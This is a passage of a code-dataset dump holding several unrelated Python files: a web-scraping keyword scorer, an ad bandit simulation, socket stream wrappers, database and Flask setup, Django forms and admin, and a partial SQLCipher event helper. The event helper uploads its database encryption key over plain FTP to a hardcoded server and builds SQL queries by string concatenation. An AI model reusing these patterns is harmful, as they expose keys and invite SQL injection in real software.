math.sin(m_rad)\n # print(m_x, m_y)\n\n print(math.sqrt((h_x - m_x)**2 + (h_y - m_y)**2))\n\n\nmain()\n","sub_path":"abc/abc168c.py","file_name":"abc168c.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"594129743","text":"from collections import Counter\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport re\r\nfrom nltk.tokenize import RegexpTokenizer\r\nfrom stop_words import get_stop_words\r\nfrom nltk.stem.porter import PorterStemmer\r\n\r\nimport math\r\n\r\nimport sys\r\n\r\n\r\ntokenizer = RegexpTokenizer(r'\\w+')\r\n\r\n# create English stop words list\r\nen_stop = get_stop_words('en')\r\n\r\n# Create p_stemmer of class PorterStemmer\r\np_stemmer = PorterStemmer()\r\n \r\n\r\nclass LDA:\r\n\r\n def process(url, kwd):\r\n kwd = kwd.lower()\r\n tokens = tokenizer.tokenize(kwd)\r\n # remove stop words from tokens\r\n stopped_tokens = [i for i in tokens if not i in en_stop]\r\n # stem tokens\r\n stemmed_tokens = [p_stemmer.stem(i) for i in stopped_tokens]\r\n # add tokens to list\r\n keytokens = stemmed_tokens\r\n #print(keytokens)\r\n\r\n #print('***********' + kwd)\r\n d = 0\r\n try:\r\n\r\n print(\"in process\", url)\r\n # kwd= \"python java\"\r\n html = \"\"\r\n text = \"\"\r\n try:\r\n html = requests.get(url).content\r\n # 1 Recoding\r\n unicode_str = html.decode(\"utf8\")\r\n encoded_str = unicode_str.encode(\"ascii\", 'ignore')\r\n 
news_soup = BeautifulSoup(encoded_str, \"html.parser\")\r\n a_text = news_soup.find_all('p')\r\n # 2 Removing\r\n y = [re.sub(r'<.+?>', r'', str(a)) for a in a_text]\r\n html = y\r\n except:\r\n pass\r\n doc=''\r\n for stmt in html:\r\n doc=doc+\" \"+stmt\r\n \r\n p_t_d = LDA.main(doc, keytokens)\r\n#ptd is topic in document\r\n res=0.0\r\n for stmt in html:\r\n #print(type(stmt))\r\n #pwd is word in topic\r\n p_w_d = LDA.main(stmt, keytokens)\r\n res=res+(p_w_d*p_t_d)\r\n\r\n print(res)\r\n\r\n\r\n\r\n except Exception as e:\r\n print(\"try1\")\r\n print(e.args[0])\r\n tb = sys.exc_info()[2]\r\n print(tb.tb_lineno)\r\n return res\r\n\r\n def main(stmnt, keytokens):\r\n raw = stmnt.lower()\r\n tokens = tokenizer.tokenize(raw)\r\n # remove stop words from tokens\r\n stopped_tokens = [i for i in tokens if not i in en_stop]\r\n # stem tokens\r\n stemmed_tokens = [p_stemmer.stem(i) for i in stopped_tokens]\r\n # add tokens to list\r\n tokens = stemmed_tokens\r\n counts = Counter(tokens)\r\n #print(counts)\r\n tot = 0\r\n for x in counts.values():\r\n tot = tot + x\r\n t = 1\r\n for w in keytokens:\r\n if w in counts.keys():\r\n t = t * counts.get(w)\r\n #print(w,'----',counts.get(w))\r\n else:\r\n t=0\r\n r=0\r\n try:\r\n r=t / tot\r\n except:\r\n pass\r\n return r\r\n\r\n\r\nif __name__ == \"__main__\":\r\n r = LDA.process(\"https://www.ndtv.com/topic/bjp-modi\", 'modi bjp')\r\n print(r)\r\n","sub_path":"LDA.py","file_name":"LDA.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"46497082","text":"import sys\nimport numpy as np\nimport bandit\n\nnp.random.seed(1337)\n\nfrom sklearn.feature_extraction.text import HashingVectorizer\n\n# Use the hashing trick to make feature vectors of uniform length (n_features) regardless\n# of the number of features passed in the context (remaining features are set to zero)\nvectorizer = HashingVectorizer(n_features=1024)\ncontextual_bandit = bandit.epsilonGreedyContextualBandit(mode='classification', epsilon=0.1, penalty='l2')\n\n# Example with three advertisments we would like to show\narms = ['advertisement_1', \n 'advertisement_2', \n 'advertisement_3', \n 'advertisement_4', \n 'advertisement_5', \n 'advertisement_6', \n 'advertisement_7', \n 'advertisement_8']\n\n# The job of the bandit is to learn the true click-through rates\n# of each arm, but for simulation purposes, we'll cheat and pretend\n# we already know.\nctrs = [0.076, 0.0521, 0.0122, 0.05215, 0.074, 0.0521, 0.07582, 0.0154]\n\n# Simulate a single context, a male website visitor aged 21 that uses Firefox\ncontext = vectorizer.fit_transform(['age_21 gender_male browser_firefox'])\n\ncounts = np.zeros(len(arms)) # Keep count of how many times each arm was chosen\nrewards = np.zeros(len(arms)) # Keep count of the rewards for each arm\n\nepochs = 10000\nsys.stdout.write('Running simulation for ' + str(epochs) + ' epochs')\nfor i in range(epochs):\n sys.stdout.write('.')\n sys.stdout.flush()\n chosen_arm = contextual_bandit.select_arm(context, arms)\n # Send reward based on our pretend CTR for the chosen arm:\n # - 1: clicked\n # - 0: not clicked\n if np.random.random() <= ctrs[arms.index(chosen_arm)]:\n contextual_bandit.reward(chosen_arm, context, 1)\n rewards[arms.index(chosen_arm)] += 1\n else:\n contextual_bandit.reward(chosen_arm, context, 0)\n rewards[arms.index(chosen_arm)] += 0\n counts[arms.index(chosen_arm)] += 1\n\nprint('done.\\nResults:')\nfor i, v in enumerate(counts):\n print('Arm ' + 
arms[i] + ' was chosen ' + str(counts[i]) + ' times, with a cumulative reward of ' + str(rewards[i]) + '.')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"235058681","text":"import io, javaobj\nimport subprocess\nfrom time import sleep\nimport zlib\n\nclass InputStream(io.BytesIO):\n def __init__(self, socket):\n super().__init__()\n\n self.debug = open(\"in_dbg\", \"ab\")\n self.socket = socket\n\n self.encode = subprocess.Popen(['gzip', '-c'], shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n\n self.flush()\n\n def flush(self):\n self.buff = b''\n self.cursor = 0\n self.shift = 0\n\n def seek(self, shift, _type=0):\n if _type == 0:\n self.shift = -self.cursor + shift\n elif _type == 1:\n self.shift = self.shift - shift\n else:\n self.shift = shift\n\n def tell(self):\n return self.cursor - self.shift\n\n def read(self, size=-1):\n if size != -1 and size > self.shift:\n data_to_read = size - self.shift\n\n if len(self.buff) + data_to_read > 8192:\n self.buff = self.buff[len(self.buff) + data_to_read - 4096:]\n\n data_read = b\"\"\n while data_to_read != 0:\n # gzip decompress\n data = self.socket.recv(data_to_read)\n data_read += data\n data_to_read -= len(bytes(data))\n\n size = len(bytes(data_read))\n\n self.debug.write(data_read)\n self.debug.flush()\n\n self.buff += data_read\n\n data = self.buff[-size + self.shift:]\n if self.shift:\n data = data[:size]\n\n else:\n if self.shift > 0:\n data = self.buff[-self.shift:]\n else:\n data = b''\n\n self.cursor += len(data)\n\n return data\n\n def close(self):\n self.encode.stdin.close()\n\n\nclass OutputStream(io.BytesIO):\n def __init__(self, socket):\n super().__init__()\n\n self.debug = open(\"out_dbg\", \"ab\")\n self.socket = socket\n\n self.write(b'\\xac\\xed\\x00\\x05')\n\n def write(self, data):\n self.debug.write(bytearray(data))\n self.debug.flush()\n self.socket.send(data)","sub_path":"RaspberryCode/package/socket.py","file_name":"socket.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"593344220","text":"from contextlib import ContextDecorator\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\nfrom .core.config import settings\n\n_engine = None\n_Session = None\n\n\ndef get_engine():\n global _engine\n if _engine is None:\n _engine = create_engine(\n settings.SQLALCHEMY_DATABASE_URI,\n pool_pre_ping=True,\n echo=settings.SQLALCHEMY_ECHO,\n )\n\n return _engine\n\n\ndef get_session():\n global _Session\n if _Session is None:\n _Session = scoped_session(sessionmaker(bind=get_engine()))\n\n return _Session()\n\n\nclass transaction(ContextDecorator):\n def __init__(self):\n self._session = None\n\n def __enter__(self):\n self._session = get_session()\n return self._session\n\n def __exit__(self, exc_type, exc_value, traceback):\n try:\n if not (exc_type and exc_value and traceback):\n self._session.commit()\n finally:\n self._session.close()\n","sub_path":"src/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"519074737","text":"import logging\nfrom uuid import uuid4 as uuid\n\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom logistik import environ\nfrom logistik.config import 
ConfigKeys\n\nenviron.initialize_env(environ.env, is_parent_process=True)\n\nlogger = logging.getLogger(__name__)\nlogging.getLogger(\"kafka.conn\").setLevel(logging.INFO)\nlogging.getLogger(\"kafka.client\").setLevel(logging.INFO)\nlogging.getLogger(\"kafka.metrics\").setLevel(logging.INFO)\n\n\ndef create_app():\n _app = Flask(\n import_name=__name__,\n template_folder=\"admin/templates/\",\n static_folder=\"admin/static/\",\n )\n\n db_host = environ.env.config.get(ConfigKeys.HOST, domain=ConfigKeys.DATABASE)\n db_port = int(environ.env.config.get(ConfigKeys.PORT, domain=ConfigKeys.DATABASE))\n db_drvr = environ.env.config.get(ConfigKeys.DRIVER, domain=ConfigKeys.DATABASE)\n db_user = environ.env.config.get(ConfigKeys.USER, domain=ConfigKeys.DATABASE)\n db_pass = environ.env.config.get(ConfigKeys.PASS, domain=ConfigKeys.DATABASE)\n db_name = environ.env.config.get(ConfigKeys.NAME, domain=ConfigKeys.DATABASE)\n db_pool = int(\n environ.env.config.get(ConfigKeys.POOL_SIZE, domain=ConfigKeys.DATABASE)\n )\n secret = environ.env.config.get(ConfigKeys.SECRET_KEY, default=str(uuid()))\n root_url = environ.env.config.get(\n ConfigKeys.ROOT_URL, domain=ConfigKeys.WEB, default=\"/\"\n )\n\n _app.config[\"SECRET_KEY\"] = secret\n _app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n _app.config[\"SQLALCHEMY_POOL_SIZE\"] = db_pool\n _app.config[\"ROOT_URL\"] = root_url\n _app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"{}://{}:{}@{}:{}/{}\".format(\n db_drvr, db_user, db_pass, db_host, db_port, db_name\n )\n\n return _app, SQLAlchemy(_app)\n\n\napp, socketio = create_app()\n# environ.init_web_auth(environ.env)\n\n# keep this, otherwise flask won't find any routes\nimport logistik.admin.routes\n","sub_path":"logistik/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"398088994","text":"# coding=utf-8\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom django import forms\nfrom apps.propiedades.models import Sector,Fuente,Unidad_ejecutora,Fuente,Sit\n\n\n\nclass SectorForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Sector\n\t\tfields = [\t\n\n\t\t\t'codigo_sector',\n\t\t\t'nombre_sector',\t\t\n\t\t]\n\n\t\tlabels = {\n\n\t\t\t'codigo_sector': 'Código del sector',\t\n\t\t\t'nombre_sector': 'Nombre del sector',\t\n\t\t}\n\n\t\twidgets = {\n\t\t\t\n\t\t\t'codigo_sector':forms.TextInput(attrs={'class':'form-control'}),\n\t\t\t'nombre_sector':forms.TextInput(attrs={'class':'form-control'}),\n\t\t\t\t\t\n\t\t}\n\n\nclass FuenteForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Fuente\n\n\t\tfields = [\t\n\t\t\t\t\t\t\t\n\t\t\t'nombre_fuente',\t\t\n\t\t]\n\n\t\tlabels = {\n\n\t\t\t'nombre_fuente': 'Nombre del fuente',\t\n\t\t}\n\n\t\twidgets = {\t\t\t\n\t\t\t\n\t\t\t'nombre_fuente':forms.TextInput(attrs={'class':'form-control'}),\n\t\t\t\t\t\n\t\t}\n\nclass SitForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Sit\n\n\t\tfields = [\t\t\t\t\t\n\t\t\n\t\t\t'nombre_sit',\t\t\n\t\t]\n\n\t\tlabels = {\n\n\t\t\t\n\t\t\t'nombre_sit': 'Nombre del sector',\t\n\t\t}\n\n\t\twidgets = {\n\t\t\t\n\t\t\t'nombre_sit':forms.TextInput(attrs={'class':'form-control'}),\n\t\t\t\t\t\n\t\t}\n\n\nclass Unidad_ejecutoraForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Unidad_ejecutora\n\n\t\tfields = [\t\n\t\t\t\t\n\t\t\t'nombre_unidad',\t\t\t\n\t\t]\n\n\t\tlabels = {\n\n\t\t\t'nombre_unidad': 'Nombre de la unidad',\t\n\t\t\t\n\t\t}\n\n\t\twidgets = 
{\n\t\t\t\n\t\t\t'nombre_unidad':forms.TextInput(attrs={'class':'form-control'}),\n\t\t\t\n\t\t\t\t\t\n\t\t}","sub_path":"apps/propiedades/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"141157568","text":"from django.contrib import admin\nfrom mezzanine.pages.admin import PageAdmin\nfrom .models import (Home, HomeBlock, StatusUpdate, Press, PressLinkBlock, PressTeamBlock, PressExpertBlock, PressPartnerBlock, PressTestimonialBlock,\n Lesson, Step, About, FeaturedChef, LessonIngredient, Ingredient, Tool, DietaryRestrictions, Cuisine, Course, Video,\n ChefPledge, LessonPledge, LessonRequest, UserSignupRequest)\n\n\n####################################\n### Mezzanine Page administation ###\n####################################\n\nclass HomeBlockAdmin(admin.TabularInline):\n model = HomeBlock\n\n\nclass HomeAdmin(PageAdmin):\n inlines = (HomeBlockAdmin,)\n\n\nclass PressLinkBlockAdmin(admin.TabularInline):\n model = PressLinkBlock\n\n\nclass PressTeamBlockAdmin(admin.TabularInline):\n model = PressTeamBlock\n \n \nclass PressExpertBlockAdmin(admin.TabularInline):\n model = PressExpertBlock\n \n \nclass PressPartnerBlockAdmin(admin.TabularInline):\n model = PressPartnerBlock\n \n \nclass PressTestimonialBlockAdmin(admin.TabularInline):\n model = PressTestimonialBlock\n\n\nclass PressAdmin(PageAdmin):\n inlines = (PressLinkBlockAdmin, PressTeamBlockAdmin, PressExpertBlockAdmin, PressPartnerBlockAdmin, PressTestimonialBlockAdmin,)\n\n####################################\n### Application adminstration ###\n####################################\n\nclass StepAdmin(admin.TabularInline):\n model = Step\n fk_name = 'lesson'\n\nclass LessonIngredientAdmin(admin.TabularInline):\n model = LessonIngredient\n\n\nclass LessonAdmin(admin.ModelAdmin):\n inlines = (StepAdmin,LessonIngredientAdmin)\n\nclass ChefPledgeAdmin(admin.TabularInline):\n model = ChefPledge\n\nclass LessonPledgeAdmin(admin.TabularInline):\n model = LessonPledge\n\nclass LessonRequestAdmin(admin.ModelAdmin):\n inlines = (LessonPledgeAdmin, ChefPledgeAdmin)\n\n\nclass FeaturedChefAdmin(admin.ModelAdmin):\n def formfield_for_foreignkey(self, db_field, request=None, **kwargs):\n\n field = super(FeaturedChefAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\n if db_field.name == 'chef':\n field.queryset = field.queryset.filter(profile__professional_chef = True)\n\n return field\n\n\n\nadmin.site.register(Home, HomeAdmin)\nadmin.site.register(Press, PressAdmin)\nadmin.site.register(StatusUpdate, PageAdmin)\nadmin.site.register(About, PageAdmin)\nadmin.site.register(FeaturedChef, FeaturedChefAdmin)\nadmin.site.register(Lesson, LessonAdmin)\nadmin.site.register(DietaryRestrictions, admin.ModelAdmin)\nadmin.site.register(Ingredient, admin.ModelAdmin)\nadmin.site.register(Tool, admin.ModelAdmin)\nadmin.site.register(Course, admin.ModelAdmin)\nadmin.site.register(Cuisine, admin.ModelAdmin)\nadmin.site.register(Video, admin.ModelAdmin)\nadmin.site.register(LessonRequest, LessonRequestAdmin)\nadmin.site.register(UserSignupRequest, admin.ModelAdmin)","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"202955137","text":"# -*- coding: utf-8 -*-\nimport sys\n#reload(sys) \n#sys.setdefaultencoding('utf-8')\nimport importlib\nimportlib.reload(sys)\nimport sqlite3\nfrom 
pysqlcipher3 import dbapi2 as sqlite\r\n#import sqlite3 as sqlite\r\nfrom ftplib import FTP\r\nimport os.path\r\nimport shutil\r\nimport random\r\nimport string\r\nimport getpass\r\ndef downloadfile(ftp, remotepath, localpath):\r\n bufsize = 1024\r\n fp = open(localpath, 'wb')\r\n ftp.retrbinary('RETR ' + remotepath, fp.write, bufsize)\r\n ftp.set_debuglevel(0)\r\n fp.close()\r\ndef ftpconnect(host, username, password):\r\n ftp = FTP()\r\n # ftp.set_debuglevel(2)\r\n ftp.connect(host, 21)\r\n ftp.login(username, password)\r\n return ftp\r\ndef uploadfile(ftp, remotepath, localpath):\r\n bufsize = 1024\r\n fp = open(localpath, 'rb')\r\n ftp.storbinary('STOR ' + remotepath, fp, bufsize)\r\n ftp.set_debuglevel(0)\r\n fp.close()\r\ndef chdir(dir, ftp): \r\n if directory_exists(dir, ftp) is False: # (or negate, whatever you prefer for readability)\r\n ftp.mkd(dir)\r\n ftp.cwd(dir)\r\n\r\n# Check if directory exists (in current location)\r\ndef directory_exists(dir, ftp):\r\n filelist = []\r\n ftp.retrlines('LIST',filelist.append)\r\n for f in filelist:\r\n if f.split()[-1] == dir and f.upper().startswith('D'):\r\n return True\r\n return False\r\n\r\ndef id_generator(size=6, chars=string.ascii_uppercase + string.digits):\r\n return ''.join(random.choice(chars) for _ in range(size))\r\n\r\n\r\nclass EventHelper:\r\n\t#Sqlite Data\r\n\tDBName = \"\"\r\n\tVideoName = \"\"\r\n\tsqlConn = None\r\n\thostIp = \"140.124.182.51\"\r\n\tdefaultStoragePath = \"/III_share/\"\r\n\tdef __init__(self, databaseName=None):\r\n\t\tif databaseName == None:\r\n\t\t\tprint (\"please enter DB Name!!\")\r\n\t\t\treturn None\r\n\t\telse:\r\n\t\t\tself.DBName = databaseName\r\n\t\t\tself.sqlConn = sqlite.connect(self.DBName)\r\n\t\t\tself.sqlCursor = self.sqlConn.cursor()\r\n\t\t\tif os.path.isfile(\".Key.txt\"):\r\n\t\t\t\tprint (\"Key get!\")\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tconfig = open('config.txt','r')\r\n\t\t\t\t\tconfigSet = config.read().split('\\n')\r\n\t\t\t\t\tftp = ftpconnect(self.hostIp, configSet[1], configSet[2])\r\n\r\n\t\t\t\t\tif(configSet[3]==self.defaultStoragePath):\r\n\t\t\t\t\t\tnewPath = id_generator()\r\n\t\t\t\t\t\tchdir(self.defaultStoragePath+newPath+\"/\",ftp)\r\n\t\t\t\t\t\tf = open('config.txt', 'w')\r\n\t\t\t\t\t\tf.write(configSet[0]+\"\\n\"+configSet[1]+\"\\n\"+configSet[2]+\"\\n\"+configSet[3]+newPath+\"/\")\r\n\t\t\t\t\t\tf.close()\r\n\t\t\t\t\tconfigSet[3] = configSet[3]+newPath+\"/\"\r\n\r\n\t\t\t\t\tdownloadfile(ftp, configSet[3]+\"Key.txt\", \"Key.txt\")####################################\r\n\t\t\t\t\tshutil.move(\"Key.txt\",\".Key.txt\") \r\n\t\t\t\t\tftp.quit()\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint(\"Key txt isn't on the net??\");\r\n\t\t\t\t\tf = open('Key.txt', 'w')\r\n\t\t\t\t\t#key1 = raw_input('please input Key : ')\r\n\t\t\t\t\tkey1 = getpass.getpass('please input Key : ')\r\n\t\t\t\t\tf.write(key1)\r\n\t\t\t\t\tf.close()\r\n\t\t\t\t\tshutil.move(\"Key.txt\",\".Key.txt\")\r\n\t\t\t\t\tuploadfile(ftp,configSet[3]+\"Key.txt\",\".Key.txt\")\r\n\t\t\t\t\tftp.quit()\r\n\t\t\tshutil.move(\".Key.txt\",\"Key.txt\") \r\n\t\t\tf = open('Key.txt','r')\r\n\t\t\tself.DBKey = f.read()\r\n\t\t\tf.close()\r\n\t\t\tshutil.move(\"Key.txt\",\".Key.txt\") \t \t \r\n\t\t\t#os.remove(\"Key.txt\")\r\n\t\t\t#self.sqlConn.execute(\"PRAGMA Key='jiemin'\")\r\n\t\t\tself.sqlConn.execute(\"PRAGMA Key='\"+self.DBKey+\"'\")\r\n\t\t\tself.sqlConn.execute(\"CREATE TABLE t(id int)\")\r\n\t\t\tself.sqlConn.execute(\"DROP TABLE t\")\t\r\n\t\t\tself.sqlConn.commit()\r\n\r\n\t\t\tprint (\"Event sqlite Helper created!!\")\r\n\r\n\tdef __del__(self):\r\n\t\tself.sqlConn.close()\r\n\t\tprint (\"Event Sqlite Helper: ByeBye!\")\r\n\r\n\tdef setVideoName(self, videoName):\r\n\t\tif self.sqlConn is not None:\r\n\t\t\tself.VideoName 
= \"F\"+str(videoName).split('.')[0]\n\t\t\t#print (\"Event Sqlite: Video name is \\\"\"+unicode(self.VideoName,\"utf-8\")+\"\\\"\")\n\t\t\tprint (\"Event Sqlite: Video name is \\\"\"+self.VideoName+\"\\\"\")\n\t\t\tself.sqlConn.execute(\"PRAGMA Key='\"+self.DBKey+\"'\")\n\t\t\tregionTableName = str(\"CREATE TABLE IF NOT EXISTS '\"+self.VideoName+\"_region' (id INTEGER PRIMARY KEY AUTOINCREMENT, regionName text, position1x int, position1y int, position2x int, position2y int, position3x int, position3y int, position4x int, position4y int, bounding1x, bounding1y, bounding2x, bounding2y, size1 int, size2 int, size3 int, size4 int, hide, UpdateTime DATETIME DEFAULT CURRENT_TIMESTAMP)\")\n\t\t\tself.sqlConn.execute(regionTableName)\n\t\t\tself.sqlConn.commit()\n\t\t\tautoEventTable = str(\"CREATE TABLE IF NOT EXISTS '\"+self.VideoName+\"_event_a' (id INTEGER PRIMARY KEY AUTOINCREMENT, regionId int, frame int, source int, serialId int, UpdateTime DATETIME DEFAULT CURRENT_TIMESTAMP)\")\n\t\t\tself.sqlConn.execute(autoEventTable)\n\t\t\tself.sqlConn.commit()\n\t\t\tuserEventTable = str(\"CREATE TABLE IF NOT EXISTS '\"+self.VideoName+\"_event_u' (id INTEGER PRIMARY KEY AUTOINCREMENT, s_frame int, e_frame, title text, source int, serialId int, UpdateTime DATETIME DEFAULT CURRENT_TIMESTAMP)\")\n\t\t\tself.sqlConn.execute(userEventTable)\n\t\t\tself.sqlConn.commit()\n\t\t\tuserRelEventTable = str(\"CREATE TABLE IF NOT EXISTS '\"+self.VideoName+\"_event_r' (id INTEGER PRIMARY KEY AUTOINCREMENT, eventId int, s_frame int, e_frame, title text, source int, serialId int, UpdateTime DATETIME DEFAULT CURRENT_TIMESTAMP)\")\n\t\t\tself.sqlConn.execute(userRelEventTable)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeRegionData(self, regionName, pos, bndbox, sizes):\n\t\tprint(pos[0][0])\n\t\tprint(pos[0][1])\n\t\tprint(pos[1][0])\n\t\tprint(pos[1][1])\n\t\tprint(pos[2][0])\n\t\tprint(pos[2][1])\n\t\tprint(pos[3][0])\n\t\tprint(pos[3][1])\n\t\tprint(\"------------------\")\n\t\tprint(bndbox[0])\n\t\tprint(bndbox[1])\n\t\tprint(bndbox[2])\n\t\tprint(bndbox[3])\n\n\t\tprint(\"------------------\")\n\t\tprint(sizes[0])\n\t\tprint(sizes[1])\n\t\tprint(sizes[2])\n\t\tprint(sizes[3])\n\t\tprint(\">>>>>>>>>>>>>>>>>>>>>>>>>\")\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_region' (regionName, position1x, position1y, position2x, position2y, position3x, position3y, position4x, position4y, bounding1x, bounding1y, bounding2x, bounding2y, size1, size2, size3, size4, hide) VALUES ('\"+str(regionName)+\"', \"+str(pos[0][0])+\", \"+str(pos[0][1])+\", \"+str(pos[1][0])+\", \"+str(pos[1][1])+\", \"+str(pos[2][0])+\", \"+str(pos[2][1])+\", \"+str(pos[3][0])+\", \"+str(pos[3][1])+\", \"+str(bndbox[0])+\", \"+str(bndbox[1])+\", \"+str(bndbox[2])+\", \"+str(bndbox[3])+\", \"+str(sizes[0])+\", \"+str(sizes[1])+\", \"+str(sizes[2])+\", \"+str(sizes[3])+\", 0)\")\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef changeHideStatus(self, regionId, isHide):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"update '\"+self.VideoName+\"_region' set hide = '\"+str(isHide)+\"' where id is '\"+str(regionId)+\"'\")\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef updateRegionData(self, regionId, regionName, pos, bndbox, sizes):\n\t\tif self.sqlConn is not 
None:\n\t\t\tprint(pos[0][0])\n\t\t\tprint(bndbox[0])\n\t\t\tprint(sizes[0])\n\t\t\tprint(\"----------------------------\")\n\n\t\t\t\n\t\t\tsqlExecuteString = str(\"update '\"+self.VideoName+\"_region' set regionName = '\"+str(regionName)+\"', position1x = \"+str(pos[0][0])+\", position1y = \"+str(pos[0][1])+\", position2x = \"+str(pos[1][0])+\", position2y = \"+str(pos[1][1])+\", position3x = \"+str(pos[2][0])+\", position3y = \"+str(pos[2][1])+\", position4x = \"+str(pos[3][0])+\", position4y = \"+str(pos[3][1])+\", bounding1x = \"+str(bndbox[0])+\", bounding1y = \"+str(bndbox[1])+\", bounding2x = \"+str(bndbox[2])+\", bounding2y = \"+str(bndbox[3])+\", size1 = \"+str(sizes[0])+\", size2 = \"+str(sizes[1])+\", size3 = \"+str(sizes[2])+\", size4 = \"+str(sizes[3])+\" where id is '\"+str(regionId)+\"'\")\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\t\n\tdef updateEvent(self, eventType, id, title, s_frame, e_frame):\n\t\ttables = {'relation': '_event_r', 'user_event': '_event_u'}\n\t\twheres = {'relation': 'eventId', 'user_event': 'id'}\n\t\tif self.sqlConn is not None and eventType in tables:\n\t\t\tsqlExecuteString = str(\"update '\"+self.VideoName+tables[eventType]+\"' set s_frame = \"+str(s_frame)+\", e_frame = \"+str(e_frame)+\" where \"+ wheres[eventType] +\" is \"+str(id))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteRegion(self, regionId):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_region' where id = \"+ str(regionId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef getRegion(self, regionIds=[]):\n\t\tself.regions = []\n\t\tregionsStr = ''\n\t\tif len(regionIds) == 1:\n\t\t\tregionsStr = ' where A.id = ' + str(regionIds[0])\n\t\telif len(regionIds) > 1:\n\t\t\tregionsStr = ' where A.id in (' + str(regionIds[0])\n\t\t\tfor index, id in enumerate(regionIds):\n\t\t\t\tif index > 0:\n\t\t\t\t\tregionsStr += ',' + str(id)\n\t\t\tregionsStr += ')'\n\t\tsqlExecuteString = str(\t\"SELECT A.id, regionName, position1x, position1y, position2x, position2y, position3x, position3y, position4x, position4y, bounding1x, bounding1y, bounding2x, bounding2y, size1, size2, size3, size4, hide from '\"+self.VideoName+\"_region' A \" + regionsStr)\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\tid = str(row[0])\n\t\t\tregion = str(row[1])\n\t\t\tpoints = [(int(row[i]), int(row[i+1])) for i in [2, 4, 6, 8]]\n\t\t\tbndbox = [(int(row[i]), int(row[i+1])) for i in [10, 12]]\n\t\t\tsizes = [int(row[i]) for i in [14, 15, 16, 17]]\n\t\t\thide = int(row[18])\n\t\t\tself.regions.append((id, region, points, bndbox, sizes, hide, None, None))\n\t\tif len(self.regions) is 0:\n\t\t\treturn None\n\t\treturn self.regions\n\n\tdef getEventByShape(self, shapeId):\n\t\tself.events = []\n\t\tactionStr = \" (select ' 位於 ') \"\n\t\tregionNameStr = \"(select regionName from '\"+self.VideoName+\"_region' where id = A.regionId)\"\n\t\tsequenceStr = \"(select '(' || sequence || ')' from '\"+self.VideoName+\"_seq' where source = A.source and serialId = A.serialId)\"\n\t\tlabelNameStr = \"(select labelName from '\"+self.VideoName+\"' where id = A.serialId)\"\n\t\ttitleStr = labelNameStr + \"||\" + sequenceStr + \"||\" + actionStr + \"||\" + regionNameStr + \" as 
